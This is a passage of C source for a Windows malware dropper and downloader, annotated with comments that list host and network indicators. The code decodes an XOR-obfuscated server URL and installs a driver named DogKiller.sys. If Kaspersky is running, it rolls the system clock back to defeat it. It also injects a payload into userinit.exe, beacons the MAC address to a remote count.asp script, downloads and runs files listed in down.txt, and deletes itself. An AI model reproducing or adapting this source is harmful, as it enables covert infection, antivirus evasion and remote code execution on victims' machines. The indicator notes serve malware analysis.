}
}
else
{
GetTempPath(MAX_PATH, szTempDir);
GetTempFileName( szTempDir, "sv", iProcessNameNumber, szTempExe);
// 循环10次
for ( DWORD index = 0; index < 5; index++)
{
hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
if ( hRes == S_OK )
{
break;
}
Sleep(1000);
}
if ( index == 5)
{
return;
}
}
if ( !bIsIni )
{
RunProcess(szTempExe, TRUE);
return;
}
}
//
// Report local host information to the server. The original header listed
// MAC address, AV product name, OS version and IE version; the request built
// below actually carries only a MAC string and a version string.
//
// Analyst note: this is the install beacon. It performs a plain HTTP GET to
//   <szDomain>clcount/count.asp?mac=<szMac>&ver=<Version>
// through WinInet with the user-agent string "GOOGLE"; both the URL pattern
// and the user-agent are usable proxy/network-log indicators. The WinInet
// exports are resolved at runtime via LoadLibrary/GetProcAddress, so WinInet
// need not appear in a static import table. INTERNET_FLAG_RELOAD bypasses the
// WinInet cache, so every execution produces a live request.
//
// Params:  szDomain - base URL prefix copied verbatim into the request
//          Version  - version string appended after "&ver="
//          szMac    - MAC string appended after "mac="
// Returns: TRUE once InternetOpenUrlA returns a handle; FALSE if either
//          InternetOpenA or InternetOpenUrlA fails. Neither handle is closed
//          on the TRUE path.
// XXXInternetOpen / XXXInternetOpenUrl / XXXInternetCloseHandle are function
// pointer typedefs declared elsewhere in the project.
//
BOOL RePortState(char *szDomain, char *Version, char *szMac)
{
XXXInternetOpen tempInternetOpen;
XXXInternetOpenUrl tempInternetOpenUrl;
XXXInternetCloseHandle tempInternetCloseHandle;
// Dynamic resolution of the three WinInet functions used below.
tempInternetOpen = (XXXInternetOpen)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenA");
tempInternetOpenUrl = (XXXInternetOpenUrl)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenUrlA");
tempInternetCloseHandle = (XXXInternetCloseHandle)GetProcAddress( LoadLibrary("wininet.dll"), "InternetCloseHandle");
HINTERNET hropen=NULL;
HINTERNET hropenurl=NULL;
// "GOOGLE" is sent as the HTTP User-Agent header.
hropen=tempInternetOpen("GOOGLE",
PRE_CONFIG_INTERNET_ACCESS,
NULL,
INTERNET_INVALID_PORT_NUMBER,
0);
if(hropen==NULL)
{
return FALSE;
}
char szSendBuf[MAX_PATH] = {0};
char szFirstPartBuf[] = "clcount/count.asp?mac=";
char szSendPartBuf[] = "&ver=";
// Build the request URL: <szDomain>clcount/count.asp?mac=<szMac>&ver=<Version>
strcpy(szSendBuf, szDomain);
strcat(szSendBuf, szFirstPartBuf);
strcat(szSendBuf, szMac);
strcat(szSendBuf, szSendPartBuf);
strcat(szSendBuf, Version);
// The response body is never read; only the act of requesting matters here.
hropenurl = tempInternetOpenUrl(hropen,
szSendBuf,
NULL,
0,
INTERNET_FLAG_RELOAD,
0);
if(hropenurl==NULL)
{
if(hropen)
{
tempInternetCloseHandle(hropen);
hropen=NULL;
}
return FALSE;
}
return TRUE;
}
//
// Check whether the given marker string is already recorded in the local
// state INI file.
//
// The file's [localfile] section holds "count" (number of recorded markers)
// and keys "biaoji1" .. "biaoji<count>", each holding one marker value.
// The function returns TRUE if any of those keys equals szInMark.
//
// Analyst note: this INI is the per-host "already downloaded" ledger used by
// WinMain; its presence and the [localfile]/biaojiN keys are a host-based
// artifact of a prior run.
//
// Params:  szIniFilePath - full path of the state INI
//          szInMark      - marker value to look for
// Returns: TRUE if a matching biaojiN value exists, else FALSE.
//
BOOL FindMarks(char *szIniFilePath, char *szInMark)
{
int iRenturnValue = 0; // unused
char szGettedStr[10] = {0};
int icount = 0;
GetPrivateProfileString("localfile", "count","0",szGettedStr,sizeof(szGettedStr), szIniFilePath);
if (szGettedStr[0] != 0x00)
{
icount = atoi(szGettedStr);
}
// No (or non-positive) count means there are no markers recorded.
if (icount <= 0)
{
return FALSE;
}
char szNumber[5] = {0};
char szMarkStr[10] = {0};
strcpy(szMarkStr, "biaoji");
char szTotalStr[10] = {0};
// Walk biaoji1 .. biaoji<icount> and compare each value with szInMark.
for (int j = 1; j < icount + 1; j++)
{
// Reset the receive buffers for this iteration.
memset(szGettedStr, 0, 10);
memset(szNumber, 0, 5);
itoa(j, szNumber, 10);
memset(szTotalStr, 0 , 10);
strcpy(szTotalStr, szMarkStr);
strcat(szTotalStr, szNumber); // key name "biaoji<j>"
GetPrivateProfileString("localfile", szTotalStr,"0",szGettedStr,sizeof(szGettedStr), szIniFilePath);
if (strcmp(szGettedStr, szInMark) == 0)
{
return TRUE;
}
}
return FALSE;
}
// Self-deletion via a dropped batch file.
//
// Writes <SystemDir>\del09.bat containing a ":delloop" label that repeatedly
// runs `del "<own path>"` until the executable no longer exists, then
// `del %0` to remove the batch file itself, and launches it through
// RunProcess() (defined elsewhere).
//
// Analyst note: host artifacts of this routine are a file named del09.bat
// created in the system directory and a cmd.exe child process running it;
// the batch file also contains the full path of the dropper, which is useful
// for reconstructing the original location if the .bat is recovered.
void DelSelf()
{
char strFileContent[256]={0};
char MySelf[256]={0};
GetModuleFileName(0,MySelf,256); // full path of this executable
// Batch script text assembled piece by piece:
strcpy(strFileContent,":");
strcat(strFileContent,"delloop\r\n"); // :delloop
strcat(strFileContent,"del ");
strcat(strFileContent,"\"");
strcat(strFileContent,MySelf); // del "<own path>"
strcat(strFileContent,"\"\r\n");
strcat(strFileContent,"if exist \"");
strcat(strFileContent,MySelf); // if exist "<own path>" goto delloop
strcat(strFileContent,"\" goto delloop\r\n");//
strcat(strFileContent,"del %0"); // the batch removes itself last
TCHAR strSysDir[256]={0};
GetSystemDirectory(strSysDir,MAX_PATH);
strcat(strSysDir,"\\del09.bat");// dropped at <SystemDir>\del09.bat
HFILE hFile=_lcreat(strSysDir,0);// create/truncate the batch file
_lwrite(hFile,strFileContent,strlen(strFileContent));//
_lclose(hFile); //
// ShellExecute(0,0,strSysDir,0,0,SW_HIDE);
RunProcess(strSysDir, FALSE); // run the batch; second argument's meaning is defined with RunProcess elsewhere
}
// Look up a process id by executable name using the ToolHelp snapshot API.
//
// Params:  name - executable file name compared case-sensitively (strcmp)
//          against PROCESSENTRY32.szExeFile.
// Returns: th32ProcessID of the first matching entry after the first one
//          returned by Process32First, or 0 if none matches or the snapshot
//          cannot be enumerated.
//
// Behavioural details visible in the code: the entry returned by
// Process32First is never compared (the loop only examines Process32Next
// results); on the early `return 0` the snapshot handle is not closed.
// WinMain calls this with "avp.exe" and "AVP.EXE" to detect a Kaspersky
// process before the driver step.
DWORD GetProcessIdFromName1(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
while(1)
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
};
CloseHandle(hSnapshot);
return id;
}
// Entry point. Observable sequence, as written below:
//   1. Marks its own file for deletion at next reboot (MoveFileEx with
//      MOVEFILE_DELAY_UNTIL_REBOOT; the OS records this as a pending rename
//      operation, which is inspectable by defenders).
//   2. Maps its own image, locates an appended payload ("second file") and,
//      behind it, an XOR-0x9a-encoded download URL preceded by a 10-byte
//      version string.
//   3. Calls RaiseToDebugP(), then hands <TEMP>\DogKiller.sys to xxxx()
//      (labelled "driver installation" by the original comment). If a process
//      named avp.exe or AVP.EXE exists, the system clock is set to 1999-11
//      around that step and restored afterwards.
//   4. Opens \\.\PciFtDisk and issues IOCTL_PASS_SNDISK then IOCTL_INJECT_FILE
//      with the payload; the original comment describes this as writing the
//      payload into the system's userinit.exe.
//   5. Builds a MAC string, beacons via RePortState(), downloads down.txt into
//      the system directory, keeps a ledger in <SystemDir>\systemInfomations.ini,
//      downloads/runs each listed item not yet in the ledger, then self-deletes
//      (K32DeleteSelfFile, DelSelf).
//
// Analyst note — host/network indicators visible in this function:
//   files   <TEMP>\DogKiller.sys, <SystemDir>\down.txt, <SystemDir>\systemInfomations.ini
//   device  \\.\PciFtDisk
//   events  system time set back to 1999-11 and restored within ~1 s
//   debug   OutputDebugString strings "aaaaa", "xxxxx", "yyyy"
//   network the RePortState beacon, then the down.txt fetch and follow-on downloads
//
// MapFile, GetOverlayOffset, UnmapFile, RaiseToDebugP, xxxx, DownloadFile,
// K32DeleteSelfFile and the IOCTL_* constants are defined elsewhere in the
// project and are not visible here.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
TCHAR szCurrentModule[MAX_PATH];
TCHAR szSysPath[MAX_PATH];
DWORD dwFileSize, dwVirusDataSize, dwURLLength;
LPVOID lpFileData, lpVirusData, lpURLData;
GetModuleFileName(NULL, szCurrentModule, MAX_PATH);
SetFileAttributes(szCurrentModule, FILE_ATTRIBUTE_NORMAL);
// Schedule deletion of this executable at the next reboot.
MoveFileEx(szCurrentModule, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
// Map this executable into memory.
lpFileData = MapFile(szCurrentModule, &dwFileSize, TRUE);
if ( lpFileData == NULL )
{
return -1;
}
// Locate the second (appended) file inside the mapped image.
lpVirusData = GetOverlayOffset(lpFileData, dwFileSize, &dwVirusDataSize);
if ( lpVirusData == NULL || dwVirusDataSize == 0 )
{
UnmapFile(lpFileData);
return -2;
}
// Locate the URL data appended after the second file.
lpURLData = GetOverlayOffset(lpVirusData, dwVirusDataSize, &dwURLLength);
if ( lpURLData == NULL || dwURLLength == 0 )
{
UnmapFile(lpFileData);
return -3;
}
//////////////////////////////////////////////////////////////////////////
// Extract the URL and version number, used for downloading and for
// reporting this host's information.
//////////////////////////////////////////////////////////////////////////
char szDownurl[MAX_PATH] = {0};
char szVersionData[12] = {0};
char *szCurVersion = (char *)(lpURLData) - 10; // the 10 bytes before the URL hold the current version
char *szUrl = (char*)lpURLData; // tail of the file: the encoded download URL
// Copy the current version string.
for(int m = 0; m < 10; m++)
{
szVersionData[m] = szCurVersion[m];
}
// Decode the URL: each byte is XORed with 0x9a; stops at the first NUL.
// (Analyst note: the embedded configuration can be recovered statically by
// applying the same single-byte XOR to the overlay.)
for ( DWORD index = 0; index < dwURLLength - 4; index++)
{
szDownurl[index] = szUrl[index] ^ 0x9a;
if ( szDownurl[index] == 0 )
{
break;
}
}
//MessageBox(NULL, szDownurl, szVersionData, NULL);
//////////////////////////////////////////////////////////////////////////
// Privilege elevation (RaiseToDebugP defined elsewhere).
RaiseToDebugP();
GetTempPath(MAX_PATH, szSysPath);
PathAppend(szSysPath, "DogKiller.sys"); // <TEMP>\DogKiller.sys
// Driver installation.
// The original comment: check for Kaspersky (avp.exe); if present, change
// the system time so that it is rendered ineffective during the next step.
int pidcheck1=GetProcessIdFromName1("avp.exe");
int pidcheck2=GetProcessIdFromName1("AVP.EXE");
// Save the real system time first so it can be restored below.
SYSTEMTIME RealTime;
GetSystemTime(&RealTime);
if(pidcheck1!=0||pidcheck2!=0)
{
SYSTEMTIME FakeTime;
::GetSystemTime(&FakeTime);
FakeTime.wYear= 1999; // clock is rolled back to November 1999
FakeTime.wMonth = 11;
SetSystemTime(&FakeTime); // observable as a system-time-change audit event
Sleep(1000);
}
xxxx(szSysPath); // defined elsewhere; receives the DogKiller.sys path
SetSystemTime(&RealTime); // restore the saved time
OutputDebugString("aaaaa");
HANDLE hDevice = CreateFile(_T("\\\\.\\PciFtDisk"), GENERIC_READ, 0, // exclusive open of the device
NULL, OPEN_EXISTING, 0, NULL);
if ( hDevice != INVALID_HANDLE_VALUE )
{
OutputDebugString("xxxxx");
#if 0
DWORD dwUrlOffset = 0x29a557;
char szBuffer[512] = {0};
szBuffer[0] = 'q';
szBuffer[1] = 't';
lpVirusData = szBuffer;
dwVirusDataSize = 512;
#else
// Offset of the URL data relative to the start of the payload.
DWORD dwUrlOffset = (DWORD)lpURLData - (DWORD)lpVirusData;
#endif
DWORD dwBytes;
char szUrlOffset[20];
itoa( dwUrlOffset, szUrlOffset, 20); // base-20 text, only used for debug output
OutputDebugString(szUrlOffset);
if ( DeviceIoControl(hDevice, IOCTL_PASS_SNDISK, &dwUrlOffset, 4, NULL, 0, &dwBytes, NULL) )
{
OutputDebugString("yyyy");
// Original comment: write the second file's data into the system userinit.exe.
if ( DeviceIoControl( hDevice, IOCTL_INJECT_FILE, lpVirusData, dwVirusDataSize, NULL, 0, &dwBytes, NULL) )
{
// ::MessageBox(NULL, "xxxxxx", "x", 0);
}
}
}
UnmapFile(lpFileData);
CloseHandle(hDevice); // called even when hDevice is INVALID_HANDLE_VALUE
//////////////////////////////////////////////////////////////////////////
// Downloader functionality.
//////////////////////////////////////////////////////////////////////////
// Build the MAC address string.
char macstr[13]="000000000000";
typedef DWORD(CALLBACK * ADAPINFO)(PIP_ADAPTER_INFO, PULONG);
ADAPINFO getadapinfo;
HINSTANCE hmodule=NULL;
hmodule=LoadLibrary("iphlpapi.dll"); // GetAdaptersInfo resolved at runtime
if(hmodule)
{
getadapinfo=(ADAPINFO)GetProcAddress(hmodule,"GetAdaptersInfo");
IP_ADAPTER_INFO Info; // room for a single adapter entry only
ULONG ulSize=sizeof(Info);
getadapinfo(&Info, &ulSize);
DWORD dwError = 0;
dwError = GetLastError();
if (&Info) // address of a local is never null, so this branch always runs
{
// Each byte is written as hex at a fixed 2-char slot; itoa appends a NUL.
itoa(Info.Address[0], &macstr[0], 16);
itoa(Info.Address[1], &macstr[2], 16);
itoa(Info.Address[2], &macstr[4], 16);
itoa(Info.Address[3], &macstr[6], 16);
itoa(Info.Address[4], &macstr[8], 16);
itoa(Info.Address[5], &macstr[10], 16);
}
// Replace embedded NULs with '0'. A single-hex-digit byte therefore
// appears as e.g. "a0" rather than "0a" in the reported MAC string.
for (int m = 0; m < 12; m++)
{
if (macstr[m] == 0x00)
{
macstr[m] = 0x30;
}
}
FreeLibrary(hmodule);
}
// Derive the server base URL by dropping the last 8 characters of the
// download URL (8 is the length of "down.txt", the file fetched below).
char szLocalDomain[MAX_PATH] = {0};
strcpy(szLocalDomain, szDownurl);
memset(szLocalDomain + strlen(szDownurl) - 8, 0, MAX_PATH/2 );
// Beacon the installation to the server.
RePortState( szLocalDomain, szVersionData, macstr);
// Download down.txt (DownloadFile defined elsewhere; second argument's
// meaning is defined with it).
DownloadFile(szDownurl, 921);
// Parse down.txt.
char szSysDir[MAX_PATH];
GetSystemDirectory(szSysDir,sizeof(szSysDir));
// Local state file of the downloader: <SystemDir>\systemInfomations.ini
char szLocalIniPath[MAX_PATH] = {0};
strcpy(szLocalIniPath, szSysDir);
strcat(szLocalIniPath, "\\systemInfomations.ini");
// Check whether the state file exists; original comment says re-download if not.
DWORD dwLocalFileExist = 0;
char szLocalVersion[20] = {0};
// Original comment: a return value of 1 means the file does not exist
// (i.e. only the default "0" was copied).
dwLocalFileExist = GetPrivateProfileString("vension","org","0",szLocalVersion,sizeof(szLocalVersion), szLocalIniPath);
if (dwLocalFileExist == 1)
{
// Write the version into the INI state file.
WritePrivateProfileString("curversion", "ver", szVersionData, szLocalIniPath);
}
// The downloaded control file: <SystemDir>\down.txt
char szDownPath[MAX_PATH] = {0};
strcpy(szDownPath, szSysDir);
strcat(szDownPath, "\\down.txt");
DWORD dwReturnValue = 0;
// Read the required version and the update URL from down.txt ([update] ver/url).
char szNewVersion[20] = {0};
char szUpdatePath[100] = {0};
dwReturnValue = GetPrivateProfileString("update","ver","0",szNewVersion,sizeof(szNewVersion), szDownPath);
dwReturnValue = GetPrivateProfileString("update","url","0",szUpdatePath,sizeof(szUpdatePath), szDownPath);
// If the version differs from the embedded one, fetch the updated downloader.
if ( (strcmp(szNewVersion, szVersionData) != 0) )
{
DownloadFile(szUpdatePath, 890);
}
// Check whether download tasks should run ([file] isfile).
int iNeedDown = 0;
char szNeedDownBuf[5] = {0};
GetPrivateProfileString("file","isfile","0",szNeedDownBuf,sizeof(szNeedDownBuf), szDownPath);
iNeedDown = atoi(szNeedDownBuf);
// No download tasks requested.
if (iNeedDown == 0)
{
return 0;
}
// Download and run the files listed in down.txt ([file] count, urlN, biaojiN).
int iDownCount = 0;
char szDownTimeBuf[5] = {0};
GetPrivateProfileString("file","count","0",szDownTimeBuf,sizeof(szDownTimeBuf), szDownPath);
iDownCount = atoi(szDownTimeBuf);
char szTxtDownUrl[10] = {0};
char szTxtDownMark[10] = {0};
strcpy(szTxtDownUrl, "url");
strcpy(szTxtDownMark, "biaoji");
char szCountBuf[5] = {0};
char szGetBuf[20] = {0}; // marker key to query ("biaoji<i>")
char szGetUrl[20] = {0}; // url key to query ("url<i>")
// Values read out of down.txt:
char szDownAndExecUrl[MAX_PATH] = {0};
char szFileMark[20] = {0};
// Running count of items downloaded on this host, kept in the local INI.
int isys = 0;
char szIsysBuf[5] = {0};
for(int i = 1; i < iDownCount + 1; i++)
{
memset(szGetBuf, 0, 20);
strcpy(szGetBuf, szTxtDownMark);
itoa(i, szCountBuf, 10);
strcat(szGetBuf, szCountBuf);
memset(szDownAndExecUrl, 0, MAX_PATH);
memset(szFileMark, 0, 20);
// Read the marker first; if it is already in the local ledger skip the item,
// otherwise download and execute it.
GetPrivateProfileString("file", szGetBuf, "0", szFileMark, sizeof(szFileMark), szDownPath);
// Marker not yet recorded: fetch the url and download/execute.
if (!FindMarks(szLocalIniPath, szFileMark))
{
memset(szGetUrl, 0, 20);
strcpy(szGetUrl, szTxtDownUrl);
strcat(szGetUrl, szCountBuf);
GetPrivateProfileString("file", szGetUrl, "0", szDownAndExecUrl, sizeof(szDownAndExecUrl), szDownPath);
DownloadFile(szDownAndExecUrl, i);
// Record the marker in the local ledger.
WritePrivateProfileString("localfile", szGetBuf, szFileMark, szLocalIniPath);
// Increment the item count stored in systemInfomations.ini.
GetPrivateProfileString("localfile", "count", "0", szIsysBuf, sizeof(szIsysBuf), szLocalIniPath);
isys = atoi(szIsysBuf);
isys = isys + 1;
memset(szIsysBuf, 0 , 5);
itoa(isys, szIsysBuf, 10);
WritePrivateProfileString("localfile", "count", szIsysBuf, szLocalIniPath);
}
Sleep(500);
}
//////////////////////////////////////////////////////////////////////////
// Self-removal: K32DeleteSelfFile (defined elsewhere) then the batch-file route.
K32DeleteSelfFile();
DelSelf();
return 0;
}